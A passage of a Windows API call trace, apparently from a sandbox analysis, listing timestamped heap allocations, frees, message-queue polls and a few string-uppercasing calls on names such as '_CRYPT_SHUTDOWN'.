lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0189.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0189.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0189.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c00e08 [0189.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0189.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0189.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c114e8 [0189.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c00e08 | out: hHeap=0x970000) returned 1 [0189.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0189.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0189.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0189.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.654] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0189.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0189.654] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0189.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0189.654] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0189.656] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.656] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0189.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0189.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0189.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0189.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.656] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0189.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0189.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.657] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.657] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0189.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c00e08 [0189.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c21bc8 [0189.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c00e08 | out: hHeap=0x970000) returned 1 [0189.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0189.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c00e08 [0189.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c21bc8 | out: hHeap=0x970000) returned 1 [0189.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c21bc8 [0189.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c00e08 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0728 | out: hHeap=0x970000) returned 1 [0189.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0189.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0189.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0189.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0189.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0189.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0189.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c114e8 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 